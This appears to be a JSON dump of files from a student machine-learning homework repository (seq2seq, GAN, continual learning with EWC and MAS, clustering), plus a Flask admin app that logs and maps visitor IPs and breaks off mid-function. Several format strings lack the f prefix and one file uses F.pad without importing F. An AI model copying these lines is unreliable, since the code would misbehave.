hidden.view(self.encoder.n_layers, 2, batch_size, -1)\r\n hidden = torch.cat((hidden[:, -2, :, :], hidden[:, -1, :, :]), dim=2)\r\n # 取的 <BOS> token\r\n input = target[:, 0]\r\n preds = []\r\n for t in range(1, target_len):\r\n output, hidden = self.decoder(input, hidden, encoder_outputs)\r\n outputs[:, t] = output\r\n # 決定是否用正確答案來做訓練\r\n teacher_force = random.random() <= teacher_forcing_ratio\r\n # 取出機率最大的單詞\r\n top1 = output.argmax(1)\r\n # 如果是 teacher force 則用正解訓練,反之用自己預測的單詞做預測\r\n input = target[:, t] if teacher_force and t < target_len else top1\r\n preds.append(top1.unsqueeze(1))\r\n preds = torch.cat(preds, 1)\r\n return outputs, preds\r\n\r\n def inference(self, input, target):\r\n ########\r\n # TODO #\r\n ########\r\n # 在這裡實施 Beam Search\r\n # 此函式的 batch size = 1\r\n # input = [batch size, input len, vocab size]\r\n # target = [batch size, target len, vocab size]\r\n batch_size = input.shape[0]\r\n input_len = input.shape[1] # 取得最大字數\r\n vocab_size = self.decoder.cn_vocab_size\r\n\r\n # 準備一個儲存空間來儲存輸出\r\n outputs = torch.zeros(batch_size, input_len, 
vocab_size).to(self.device)\r\n # 將輸入放入 Encoder\r\n encoder_outputs, hidden = self.encoder(input)\r\n # Encoder 最後的隱藏層(hidden state) 用來初始化 Decoder\r\n # encoder_outputs 主要是使用在 Attention\r\n # 因為 Encoder 是雙向的RNN,所以需要將同一層兩個方向的 hidden state 接在一起\r\n # hidden = [num_layers * directions, batch size , hid dim] --> [num_layers, directions, batch size , hid dim]\r\n hidden = hidden.view(self.encoder.n_layers, 2, batch_size, -1)\r\n hidden = torch.cat((hidden[:, -2, :, :], hidden[:, -1, :, :]), dim=2)\r\n # 取的 <BOS> token\r\n input = target[:, 0]\r\n preds = []\r\n for t in range(1, input_len):\r\n output, hidden = self.decoder(input, hidden, encoder_outputs)\r\n # 將預測結果存起來\r\n outputs[:, t] = output\r\n # 取出機率最大的單詞\r\n top1 = output.argmax(1)\r\n input = top1\r\n preds.append(top1.unsqueeze(1))\r\n preds = torch.cat(preds, 1)\r\n return outputs, preds\r\n\r\n"
},
{
"alpha_fraction": 0.49286988377571106,
"alphanum_fraction": 0.531194269657135,
"avg_line_length": 29.16666603088379,
"blob_id": "55f2136ada19807f0f20a0b84aaf8638340c8d6e",
"content_id": "2d16c3db7e17c025fce536d827310e9bf1035079",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1122,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 36,
"path": "/hw14_life_long_learning/draw.py",
"repo_name": "stronglily/lhy",
"src_encoding": "UTF-8",
"text": "import json\r\n\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\ndef plot_result(mode_list, task1, task2, task3):\r\n # draw the lines\r\n count = 0\r\n for reg_name in mode_list:\r\n label = reg_name\r\n with open('./{reg_name}_acc.txt', 'r') as f:\r\n acc = json.load(f)\r\n if count == 0:\r\n color = 'red'\r\n elif count == 1:\r\n color = 'blue'\r\n else:\r\n color = 'purple'\r\n ax1 = plt.subplot(3, 1, 1)\r\n plt.plot(range(len(acc[task1])), acc[task1], color, label=label)\r\n ax1.set_ylabel(task1)\r\n ax2 = plt.subplot(3, 1, 2, sharex=ax1, sharey=ax1)\r\n plt.plot(range(len(acc[task3]), len(acc[task1])), acc[task2], color, label=label)\r\n ax2.set_ylabel(task2)\r\n ax3 = plt.subplot(3, 1, 3, sharex=ax1, sharey=ax1)\r\n ax3.set_ylabel(task3)\r\n plt.plot(range(len(acc[task2]), len(acc[task1])), acc[task3], color, label=label)\r\n count += 1\r\n plt.ylim((0.02, 1.02))\r\n plt.legend()\r\n plt.show()\r\n return\r\n\r\n\r\nmode_list = ['ewc', 'mas', 'basic']\r\nplot_result(mode_list, 'SVHN', 'MNIST', 'USPS')\r\n"
},
{
"alpha_fraction": 0.6598639488220215,
"alphanum_fraction": 0.6743764281272888,
"avg_line_length": 32.421875,
"blob_id": "4055f72eed29b0d50c974340693bb09cdc9c51c7",
"content_id": "c66d88742141a1213ed1958c4930de2993f48998",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2323,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 64,
"path": "/hw8_seq2seq/testing.py",
"repo_name": "stronglily/lhy",
"src_encoding": "UTF-8",
"text": "from torch import nn\r\nfrom torch.utils import data\r\nfrom hw8_seq2seq.config import configurations\r\nfrom hw8_seq2seq.data import EN2CNDataset\r\nfrom hw8_seq2seq.main import device\r\nfrom hw8_seq2seq.utils import build_model, tokens2sentence, computebleu\r\n\r\n\r\ndef test(model, dataloader, loss_function):\r\n model.eval()\r\n loss_sum, bleu_score = 0.0, 0.0\r\n n = 0\r\n result = []\r\n for sources, targets in dataloader:\r\n sources, targets = sources.to(device), targets.to(device)\r\n batch_size = sources.size(0)\r\n outputs, preds = model.inference(sources, targets)\r\n # targets 的第一個 token 是 <BOS> 所以忽略\r\n outputs = outputs[:, 1:].reshape(-1, outputs.size(2))\r\n targets = targets[:, 1:].reshape(-1)\r\n\r\n loss = loss_function(outputs, targets)\r\n loss_sum += loss.item()\r\n\r\n # 將預測結果轉為文字\r\n targets = targets.view(sources.size(0), -1)\r\n preds = tokens2sentence(preds, dataloader.dataset.int2word_cn)\r\n sources = tokens2sentence(sources, dataloader.dataset.int2word_en)\r\n targets = tokens2sentence(targets, dataloader.dataset.int2word_cn)\r\n for source, pred, target in zip(sources, preds, targets):\r\n result.append((source, pred, target))\r\n # 計算 Bleu Score\r\n bleu_score += computebleu(preds, targets)\r\n\r\n n += batch_size\r\n\r\n return loss_sum / len(dataloader), bleu_score / n, result\r\n\r\n\r\ndef test_process(config):\r\n # 準備測試資料\r\n test_dataset = EN2CNDataset(config.data_path, config.max_output_len, 'testing')\r\n test_loader = data.DataLoader(test_dataset, batch_size=1)\r\n # 建構模型\r\n model, optimizer = build_model(config, test_dataset.en_vocab_size, test_dataset.cn_vocab_size)\r\n print (\"Finish build model\")\r\n loss_function = nn.CrossEntropyLoss(ignore_index=0)\r\n model.eval()\r\n # 測試模型\r\n test_loss, bleu_score, result = test(model, test_loader, loss_function)\r\n # 儲存結果\r\n with open('./test_output.txt', 'w') as f:\r\n for line in result:\r\n print (line, file=f)\r\n\r\n return test_loss, bleu_score\r\n\r\n\r\n# 在執行 Test 之前,請先行至 config 設定所要載入的模型位置\r\nif __name__ == '__main__':\r\n config = configurations()\r\n print('config:\\n', vars(config))\r\n test_loss, bleu_score = test_process(config)\r\n print('test loss: {test_loss}, bleu_score: {bleu_score}')\r\n\r\n"
},
{
"alpha_fraction": 0.6232044100761414,
"alphanum_fraction": 0.6453038454055786,
"avg_line_length": 32.80769348144531,
"blob_id": "94790a5216a686b3401043240a745d5c3172baf2",
"content_id": "83595bd7ecc573f5ebdaf7bb6996d520ec792fb5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 905,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 26,
"path": "/hw11_GAN/inference.py",
"repo_name": "stronglily/lhy",
"src_encoding": "UTF-8",
"text": "import os\r\nimport matplotlib.pyplot as plt\r\nimport torch\r\nimport torchvision\r\nfrom torch.autograd import Variable\r\nfrom hw11.hw11GAN import Generator, z_dim, workspace_dir\r\n\r\nif __name__ == '__main__':\r\n '''inference'''\r\n # load pretrained model\r\n G = Generator(z_dim)\r\n G.load_state_dict(torch.load(os.path.join(workspace_dir, 'dcgan_g.pth')))\r\n G.eval()\r\n G.cuda()\r\n # generate images and save the result\r\n n_output = 20\r\n z_sample = Variable(torch.randn(n_output, z_dim))\r\n imgs_sample = (G(z_sample).data + 1) / 2.0\r\n save_dir = os.path.join(workspace_dir, 'logs')\r\n filename = os.path.join(save_dir, 'result.jpg')\r\n torchvision.utils.save_image(imgs_sample, filename, nrow=10)\r\n # show image\r\n grid_img = torchvision.utils.make_grid(imgs_sample.cpu(), nrow=10)\r\n plt.figure(figsize=(10, 10))\r\n plt.imshow(grid_img.permute(1, 2, 0))\r\n plt.show()\r\n"
},
{
"alpha_fraction": 0.5063542723655701,
"alphanum_fraction": 0.5170770287513733,
"avg_line_length": 38.6129035949707,
"blob_id": "e1957fc89a7e107ab5fd93f9da3b8269695eb979",
"content_id": "7a5f6e7293a1bba196a34168a5380fa5394e0c14",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2615,
"license_type": "no_license",
"max_line_length": 124,
"num_lines": 62,
"path": "/hw14_life_long_learning/MAS.py",
"repo_name": "stronglily/lhy",
"src_encoding": "UTF-8",
"text": "# Memory Aware Synapses\r\nimport torch\r\nfrom torch import nn\r\n\r\n\r\nclass MAS(object):\r\n \"\"\"\r\n @article{aljundi2017memory,\r\n title={Memory Aware Synapses: Learning what (not) to forget},\r\n author={Aljundi, Rahaf and Babiloni, Francesca and Elhoseiny, Mohamed and Rohrbach, Marcus and Tuytelaars, Tinne},\r\n booktitle={ECCV},\r\n year={2018},\r\n url={https://eccv2018.org/openaccess/content_ECCV_2018/papers/Rahaf_Aljundi_Memory_Aware_Synapses_ECCV_2018_paper.pdf}\r\n }\r\n \"\"\"\r\n\r\n def __init__(self, model: nn.Module, dataloaders: list, device):\r\n self.model = model\r\n self.dataloaders = dataloaders\r\n self.params = {n: p for n, p in self.model.named_parameters() if p.requires_grad} # 抓出模型的所有參數\r\n self._means = {} # 初始化 平均參數\r\n self.device = device\r\n self._precision_matrices = self.calculate_importance() # 產生 MAS 的 Omega(Ω) 矩陣\r\n\r\n for n, p in self.params.items():\r\n self._means[n] = p.clone().detach()\r\n\r\n def calculate_importance(self):\r\n print('Computing MAS')\r\n\r\n precision_matrices = {}\r\n for n, p in self.params.items():\r\n precision_matrices[n] = p.clone().detach().fill_(0) # 初始化 Omega(Ω) 矩陣(都補零)\r\n\r\n self.model.eval()\r\n dataloader_num = len(self.dataloaders)\r\n num_data = sum([len(loader) for loader in self.dataloaders])\r\n for dataloader in self.dataloaders:\r\n for data in dataloader:\r\n self.model.zero_grad()\r\n output = self.model(data[0].to(self.device))\r\n\r\n #######################################################################################\r\n ##### 產生 MAS 的 Omega(Ω) 矩陣 ( 對 output 向量 算他的 l2 norm 的平方) 再取 gradient #####\r\n #######################################################################################\r\n output.pow_(2)\r\n loss = torch.sum(output, dim=1)\r\n loss = loss.mean()\r\n loss.backward()\r\n\r\n for n, p in self.model.named_parameters():\r\n precision_matrices[n].data += p.grad.abs() / num_data ## difference with EWC\r\n\r\n precision_matrices = {n: p for n, p in precision_matrices.items()}\r\n return precision_matrices\r\n\r\n def penalty(self, model: nn.Module):\r\n loss = 0\r\n for n, p in model.named_parameters():\r\n _loss = self._precision_matrices[n] * (p - self._means[n]) ** 2\r\n loss += _loss.sum()\r\n return loss\r\n"
},
{
"alpha_fraction": 0.6476476192474365,
"alphanum_fraction": 0.6686686873435974,
"avg_line_length": 30.225807189941406,
"blob_id": "d5acacf4a0ce9c2f9883ef82512b012be3e3c54c",
"content_id": "c5e883eaf66e1eaebdd0a1f78d4f2e3d4bf1dc53",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1063,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 31,
"path": "/hw4RNN/w2v.py",
"repo_name": "stronglily/lhy",
"src_encoding": "UTF-8",
"text": "# w2v.py\r\n# 這個block是用來訓練word to vector 的 word embedding\r\n# 注意!這個block在訓練word to vector時是用cpu,可能要花到10分鐘以上\r\nimport os\r\nimport numpy as np\r\nimport pandas as pd\r\nimport argparse\r\nfrom gensim.models import word2vec\r\nfrom hw4RNN.utils import load_training_data, load_testing_data\r\n\r\n\r\ndef train_word2vec(x):\r\n # 訓練word to vector 的 word embedding\r\n model = word2vec.Word2Vec(x, size=250, window=5, min_count=5, workers=12, iter=10, sg=1)\r\n return model\r\n\r\n\r\nif __name__ == \"__main__\":\r\n path_prefix = './'\r\n print(\"loading training data ...\")\r\n train_x, y = load_training_data('training_label.txt')\r\n train_x_no_label = load_training_data('training_nolabel.txt')\r\n\r\n print(\"loading testing data ...\")\r\n test_x = load_testing_data('testing_data.txt')\r\n\r\n model = train_word2vec(train_x + train_x_no_label + test_x)\r\n\r\n print(\"saving model ...\")\r\n # model.save(os.path.join(path_prefix, 'model/w2v_all.model'))\r\n model.save(os.path.join(path_prefix, 'w2v_all.model'))\r\n"
},
{
"alpha_fraction": 0.5784753561019897,
"alphanum_fraction": 0.5818385481834412,
"avg_line_length": 35.16666793823242,
"blob_id": "3d03991432ba97e29bdf8c36a246f5d44ea94121",
"content_id": "56476090c4c6fc00f9e4eae3d377e9ac17aab22c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 968,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 24,
"path": "/hw9_unsupervised/problem1.py",
"repo_name": "stronglily/lhy",
"src_encoding": "UTF-8",
"text": "import numpy as np\r\nimport torch\r\nfrom hw9.clustering import inference, predict, cal_acc, plot_scatter\r\nfrom hw9.unsupervised import AE\r\n\r\n# 將 val data 的降維結果 (embedding) 與他們對應的 label 畫出來。\r\n\r\nif __name__ == '__main__':\r\n valX = np.load('./valX.npy')\r\n valY = np.load('./valY.npy')\r\n\r\n # ==============================================\r\n # 我們示範 basline model 的作圖,\r\n # report 請同學另外還要再畫一張 improved model 的圖。\r\n # ==============================================\r\n model = AE()\r\n model.load_state_dict(torch.load('./checkpoints/last_checkpoint.pth'))\r\n model.eval()\r\n latents = inference(valX, model)\r\n pred_from_latent, emb_from_latent = predict(latents)\r\n acc_latent = cal_acc(valY, pred_from_latent)\r\n print('The clustering accuracy is:', acc_latent)\r\n print('The clustering result:')\r\n plot_scatter(emb_from_latent, valY, savefig='p1_baseline.png')\r\n"
},
{
"alpha_fraction": 0.6977611780166626,
"alphanum_fraction": 0.7014925479888916,
"avg_line_length": 30.484848022460938,
"blob_id": "0ade5a8fba40bbf3484ed0bf918dc1e4b6d216c3",
"content_id": "a2647012682951f461ca4bef13c7eb28498f4f0a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1072,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 33,
"path": "/hw14_life_long_learning/utils.py",
"repo_name": "stronglily/lhy",
"src_encoding": "UTF-8",
"text": "import torch\r\nfrom hw14_life_long_learning.data import Data, Dataloader\r\nfrom hw14_life_long_learning.model import Model\r\n\r\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\r\n\r\n\r\ndef save_model(model, optimizer, store_model_path):\r\n # save model and optimizer\r\n torch.save(model.state_dict(), '{store_model_path}.ckpt')\r\n torch.save(optimizer.state_dict(), '{store_model_path}.opt')\r\n return\r\n\r\n\r\ndef load_model(model, optimizer, load_model_path):\r\n # load model and optimizer\r\n print('Load model from {load_model_path}')\r\n model.load_state_dict(torch.load('{load_model_path}.ckpt'))\r\n optimizer.load_state_dict(torch.load('{load_model_path}.opt'))\r\n return model, optimizer\r\n\r\n\r\ndef build_model(data_path, batch_size, learning_rate):\r\n # create model\r\n model = Model().to(device)\r\n optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)\r\n data = Data(data_path)\r\n datasets = data.get_datasets()\r\n tasks = []\r\n for dataset in datasets:\r\n tasks.append(Dataloader(dataset, batch_size))\r\n\r\n return model, optimizer, tasks\r\n"
},
{
"alpha_fraction": 0.551898717880249,
"alphanum_fraction": 0.6050633192062378,
"avg_line_length": 28.230770111083984,
"blob_id": "463f23ce087a8af05020d6dd37471e725bebfa17",
"content_id": "196baae643d79c3d17212d3d31d92090545d607e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 395,
"license_type": "no_license",
"max_line_length": 37,
"num_lines": 13,
"path": "/hw14_life_long_learning/config.py",
"repo_name": "stronglily/lhy",
"src_encoding": "UTF-8",
"text": "\r\nclass configurations(object):\r\n def __init__(self):\r\n self.batch_size = 256\r\n self.num_epochs = 10000\r\n self.store_epochs = 250\r\n self.summary_epochs = 250\r\n self.learning_rate = 0.0005\r\n self.load_model = False\r\n self.store_model_path = \"./model\"\r\n self.load_model_path = \"./model\"\r\n self.data_path = \"./data\"\r\n self.mode = None\r\n self.lifelong_coeff = 0.5\r\n"
},
{
"alpha_fraction": 0.5075757503509521,
"alphanum_fraction": 0.5181818008422852,
"avg_line_length": 41.278690338134766,
"blob_id": "b89fac990b3174841f701ad6a36b2a78961c160a",
"content_id": "39d673ed81eec3b5b66d38d6788ccbd936a69872",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2760,
"license_type": "no_license",
"max_line_length": 195,
"num_lines": 61,
"path": "/hw14_life_long_learning/EWC.py",
"repo_name": "stronglily/lhy",
"src_encoding": "UTF-8",
"text": "# Elastic Weight Consolidation\r\nfrom torch import nn\r\nimport torch.nn.functional as F\r\n\r\nclass EWC(object):\r\n \"\"\"\r\n @article{kirkpatrick2017overcoming,\r\n title={Overcoming catastrophic forgetting in neural networks},\r\n author={Kirkpatrick, James and Pascanu, Razvan and Rabinowitz, Neil and Veness, Joel and Desjardins, Guillaume and Rusu, Andrei A and Milan, Kieran and Quan, John and Ramalho, Tiago and Grabska-Barwinska, Agnieszka and others},\r\n journal={Proceedings of the national academy of sciences},\r\n year={2017},\r\n url={https://arxiv.org/abs/1612.00796}\r\n }\r\n \"\"\"\r\n\r\n def __init__(self, model: nn.Module, dataloaders: list, device):\r\n\r\n self.model = model\r\n self.dataloaders = dataloaders\r\n self.device = device\r\n\r\n self.params = {n: p for n, p in self.model.named_parameters() if p.requires_grad} # 抓出模型的所有參數\r\n self._means = {} # 初始化 平均參數\r\n self._precision_matrices = self._calculate_importance() # 產生 EWC 的 Fisher (F) 矩陣\r\n\r\n for n, p in self.params.items():\r\n self._means[n] = p.clone().detach() # 算出每個參數的平均 (用之前任務的資料去算平均)\r\n\r\n def _calculate_importance(self):\r\n precision_matrices = {}\r\n for n, p in self.params.items(): # 初始化 Fisher (F) 的矩陣(都補零)\r\n precision_matrices[n] = p.clone().detach().fill_(0)\r\n\r\n self.model.eval()\r\n dataloader_num = len(self.dataloaders)\r\n number_data = sum([len(loader) for loader in self.dataloaders])\r\n for dataloader in self.dataloaders:\r\n for data in dataloader:\r\n self.model.zero_grad()\r\n input = data[0].to(self.device)\r\n output = self.model(input).view(1, -1)\r\n label = output.max(1)[1].view(-1)\r\n\r\n ############################################################################\r\n ##### 產生 EWC 的 Fisher(F) 矩陣 #####\r\n ############################################################################\r\n loss = F.nll_loss(F.log_softmax(output, dim=1), label)\r\n loss.backward()\r\n\r\n for n, p in self.model.named_parameters():\r\n precision_matrices[n].data += p.grad.data ** 2 / number_data\r\n\r\n precision_matrices = {n: p for n, p in precision_matrices.items()}\r\n return precision_matrices\r\n\r\n def penalty(self, model: nn.Module):\r\n loss = 0\r\n for n, p in model.named_parameters():\r\n _loss = self._precision_matrices[n] * (p - self._means[n]) ** 2\r\n loss += _loss.sum()\r\n return loss\r\n"
},
{
"alpha_fraction": 0.4382352828979492,
"alphanum_fraction": 0.5220588445663452,
"avg_line_length": 20.66666603088379,
"blob_id": "c11e98186ec69e7e64661c7433b77d1ae596cc6c",
"content_id": "4744e0e6d308bba4411eb84d422a4a275185795f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 680,
"license_type": "no_license",
"max_line_length": 39,
"num_lines": 30,
"path": "/hw14_life_long_learning/model.py",
"repo_name": "stronglily/lhy",
"src_encoding": "UTF-8",
"text": "# Basic Model\r\nfrom torch import nn\r\n\r\n\r\nclass Model(nn.Module):\r\n\r\n def __init__(self):\r\n super(Model, self).__init__()\r\n self.fc1 = nn.Linear(3*32*32, 1024)\r\n self.fc2 = nn.Linear(1024, 512)\r\n self.fc3 = nn.Linear(512, 256)\r\n self.fc4 = nn.Linear(256, 128)\r\n self.fc5 = nn.Linear(128, 128)\r\n self.fc6 = nn.Linear(128, 10)\r\n self.relu = nn.ReLU()\r\n\r\n def forward(self, x):\r\n x = x.view(-1, 3*32*32)\r\n x = self.fc1(x)\r\n x = self.relu(x)\r\n x = self.fc2(x)\r\n x = self.relu(x)\r\n x = self.fc3(x)\r\n x = self.relu(x)\r\n x = self.fc4(x)\r\n x = self.relu(x)\r\n x = self.fc5(x)\r\n x = self.relu(x)\r\n x = self.fc6(x)\r\n return x\r\n"
},
{
"alpha_fraction": 0.5045170187950134,
"alphanum_fraction": 0.5357887148857117,
"avg_line_length": 30.704545974731445,
"blob_id": "dc820418a62785f0206f1444e81d646c6b2c344a",
"content_id": "4021c5cce9b14e22ded36746fed661776367c1c4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1487,
"license_type": "no_license",
"max_line_length": 101,
"num_lines": 44,
"path": "/hw14_life_long_learning/preprocess.py",
"repo_name": "stronglily/lhy",
"src_encoding": "UTF-8",
"text": "# 資料預處理\r\n# 轉換 MNIST ( 1∗28∗28 ) 到 ( 3∗32∗32 )\r\n# 轉換 USPS ( 1∗16∗16 ) 到 ( 3∗32∗32 )\r\n# 正規化 圖片\r\nimport torch\r\nfrom torchvision import transforms\r\n\r\n\r\nclass Convert2RGB(object):\r\n\r\n def __init__(self, num_channel):\r\n self.num_channel = num_channel\r\n\r\n def __call__(self, img):\r\n # If the channel of img is not equal to desired size,\r\n # then expand the channel of img to desired size.\r\n img_channel = img.size()[0]\r\n img = torch.cat([img] * (self.num_channel - img_channel + 1), 0)\r\n return img\r\n\r\n\r\nclass Pad(object):\r\n\r\n def __init__(self, size, fill=0, padding_mode='constant'):\r\n self.size = size\r\n self.fill = fill\r\n self.padding_mode = padding_mode\r\n\r\n def __call__(self, img):\r\n # If the H and W of img is not equal to desired size,\r\n # then pad the channel of img to desired size.\r\n img_size = img.size()[1]\r\n assert ((self.size - img_size) % 2 == 0)\r\n padding = (self.size - img_size) // 2\r\n padding = (padding, padding, padding, padding)\r\n return F.pad(img, padding, self.padding_mode, self.fill)\r\n\r\n\r\ndef get_transform():\r\n transform = transforms.Compose([transforms.ToTensor(),\r\n Pad(32),\r\n Convert2RGB(3),\r\n transforms.Normalize(mean=[0.5, 0.5, 0.5], std=[0.5, 0.5, 0.5])])\r\n return transform\r\n"
},
{
"alpha_fraction": 0.6163229942321777,
"alphanum_fraction": 0.6291025280952454,
"avg_line_length": 28.723215103149414,
"blob_id": "64a726617ef931cd652a9ae61064c0ea05195183",
"content_id": "3e6d5b3fb3e1c980c726cf1bc79e93b1021f0155",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3785,
"license_type": "no_license",
"max_line_length": 109,
"num_lines": 112,
"path": "/hw9_unsupervised/clustering.py",
"repo_name": "stronglily/lhy",
"src_encoding": "UTF-8",
"text": "import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport torch\r\nfrom sklearn.decomposition import KernelPCA\r\nfrom sklearn.manifold import TSNE\r\nfrom sklearn.cluster import MiniBatchKMeans\r\nfrom torch.utils.data import DataLoader\r\n\r\nfrom hw9.unsupervised import preprocess, Image_Dataset, AE\r\n\r\n\r\ndef cal_acc(gt, pred):\r\n \"\"\" Computes categorization accuracy of our task.\r\n Args:\r\n gt: Ground truth labels (9000, )\r\n pred: Predicted labels (9000, )\r\n Returns:\r\n acc: Accuracy (0~1 scalar)\r\n \"\"\"\r\n # Calculate Correct predictions\r\n correct = np.sum(gt == pred)\r\n acc = correct / gt.shape[0]\r\n # 因為是 binary unsupervised clustering,因此取 max(acc, 1-acc)\r\n return max(acc, 1-acc)\r\n\r\n\r\ndef plot_scatter(feat, label, savefig=None):\r\n \"\"\" Plot Scatter Image.\r\n Args:\r\n feat: the (x, y) coordinate of clustering result, shape: (9000, 2)\r\n label: ground truth label of image (0/1), shape: (9000,)\r\n Returns:\r\n None\r\n \"\"\"\r\n X = feat[:, 0]\r\n Y = feat[:, 1]\r\n plt.scatter(X, Y, c = label)\r\n plt.legend(loc='best')\r\n if savefig is not None:\r\n plt.savefig(savefig)\r\n plt.show()\r\n return\r\n\r\n\r\n\"\"\"\r\n接著我們使用訓練好的 model,來預測 testing data 的類別。\r\n由於 testing data 與 training data 一樣,因此我們使用同樣的 dataset 來實作 dataloader。\r\n與 training 不同的地方在於 shuffle 這個參數值在這邊是 False。\r\n準備好 model 與 dataloader,我們就可以進行預測了。\r\n我們只需要 encoder 的結果(latents),利用 latents 進行 clustering 之後,就可以分類了。\r\n\"\"\"\r\ndef inference(X, model, batch_size=8):\r\n X = preprocess(X)\r\n dataset = Image_Dataset(X)\r\n dataloader = DataLoader(dataset, batch_size=batch_size, shuffle=False)\r\n latents = []\r\n for i, x in enumerate(dataloader):\r\n x = torch.FloatTensor(x)\r\n vec, img = model(x.cuda())\r\n if i == 0:\r\n latents = vec.view(img.size()[0], -1).cpu().detach().numpy()\r\n else:\r\n latents = np.concatenate((latents, vec.view(img.size()[0], -1).cpu().detach().numpy()), axis = 0)\r\n print('Latents Shape:', latents.shape)\r\n return latents\r\n\r\ndef predict(latents):\r\n # First Dimension Reduction\r\n transformer = KernelPCA(n_components=200, kernel='rbf', n_jobs=-1)\r\n kpca = transformer.fit_transform(latents)\r\n print('First Reduction Shape:', kpca.shape)\r\n\r\n # # Second Dimesnion Reduction\r\n X_embedded = TSNE(n_components=2).fit_transform(kpca)\r\n print('Second Reduction Shape:', X_embedded.shape)\r\n\r\n # Clustering\r\n pred = MiniBatchKMeans(n_clusters=2, random_state=0).fit(X_embedded)\r\n pred = [int(i) for i in pred.labels_]\r\n pred = np.array(pred)\r\n return pred, X_embedded\r\n\r\ndef invert(pred):\r\n return np.abs(1-pred)\r\n\r\ndef save_prediction(pred, out_csv='prediction.csv'):\r\n with open(out_csv, 'w') as f:\r\n f.write('id, label\\n')\r\n for i, p in enumerate(pred):\r\n f.write('{i},{p}\\n')\r\n print('Save prediction to {out_csv}.')\r\n\r\n\r\nif __name__ == '__main__':\r\n # load model\r\n model = AE()\r\n model.load_state_dict(torch.load('./checkpoints/last_checkpoint.pth'))\r\n model.eval()\r\n\r\n # 準備 data\r\n trainX = np.load('./trainX_new.npy')\r\n\r\n # 預測答案\r\n latents = inference(X=trainX, model=model)\r\n pred, X_embedded = predict(latents)\r\n\r\n # 將預測結果存檔,上傳 kaggle\r\n save_prediction(pred, 'prediction.csv')\r\n\r\n # 由於是 unsupervised 的二分類問題,我們只在乎有沒有成功將圖片分成兩群\r\n # 如果上面的檔案上傳 kaggle 後正確率不足 0.5,只要將 label 反過來就行了\r\n save_prediction(invert(pred), 'prediction_invert.csv')\r\n\r\n"
}
] | 27 |
abhijeet-001/flask_app
|
https://github.com/abhijeet-001/flask_app
|
862ed39958b23d522b22dcb7d6e710872c42cd7f
|
64f17288355c968c81cee8c2db345c2aafd59da9
|
deb8bead1c2a52260ca4f48494e5a9a3096f3f42
|
refs/heads/master
| 2020-12-12T08:41:09.279874 | 2020-01-16T04:23:41 | 2020-01-16T04:23:41 | 234,092,087 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6264028549194336,
"alphanum_fraction": 0.6399881839752197,
"avg_line_length": 33.56122589111328,
"blob_id": "c0f56d4070fbe4344d78c8febf55a8a6e798a3b1",
"content_id": "de560a712ca30ed74703cf513d97e1209be5a9b3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3386,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 98,
"path": "/views.py",
"repo_name": "abhijeet-001/flask_app",
"src_encoding": "UTF-8",
"text": "from main import app, db\nfrom flask import render_template, request, url_for, redirect, flash\nfrom models import Request, Admin\nfrom werkzeug.security import check_password_hash, generate_password_hash\nfrom forms import LoginForm, ResetPasswordForm\nfrom flask_login import login_user, current_user, logout_user, login_required\nimport ipinfo\nfrom flask_googlemaps import Map\n\n# Defines Home Page\[email protected](\"/\")\ndef index():\n if request.headers.getlist(\"X-Forwarded-For\"):\n user_ip = request.headers.getlist(\"X-Forwarded-For\")[0]\n else:\n user_ip = request.remote_addr\n # user_ip = getrequest.remote_addr\n req = Request(ip_address=user_ip)\n db.session.add(req)\n db.session.commit()\n return render_template('home.html')\n\n# 404 error page\[email protected](404)\ndef not_found(error):\n return render_template('404.html', error=error)\n\n# Admin Login Page\[email protected]('/admin/login/', methods=['GET', 'POST'])\ndef admin_login():\n if current_user.is_authenticated:\n return redirect(url_for('admin_dashboard'))\n form = LoginForm()\n if form.validate_on_submit():\n admin = Admin.query.filter_by(email=form.email.data).first()\n if admin is not None:\n if check_password_hash(admin.password, form.password.data):\n login_user(admin)\n if admin.is_fresh_login is True:\n admin.is_fresh_login = False\n db.session.commit()\n return redirect(url_for('admin_reset_password'))\n else:\n return redirect(url_for('admin_dashboard'))\n else:\n flash(u\"Invalid credentails.\", \"danger\") \n else:\n flash(u\"Invalid credentails.\", \"danger\")\n return render_template('admin/login.html', form=form)\n\n# Admin dashboard\[email protected]('/admin/')\n@login_required\ndef admin_dashboard():\n ip_markers = []\n # get all request ip\n requests = Request.query.all()\n if requests is not None:\n for req in requests:\n location = get_loc_by_ip(req.ip_address)\n if location is not None:\n ip_markers.append(location)\n\n map = Map(\"admin-google-map\",lat=17.685895,lng=77.158687, zoom=3,markers=ip_markers)\n else:\n map = Map(\"admin-google-map\",lat=17.685895,lng=77.158687, zoom=3)\n return render_template('admin/dashboard.html', map=map)\n\n# Password Reset if admin loggins for first time\[email protected]('/admin/reset-password', methods=['GET', 'POST'])\n@login_required\ndef admin_reset_password():\n form = ResetPasswordForm()\n if 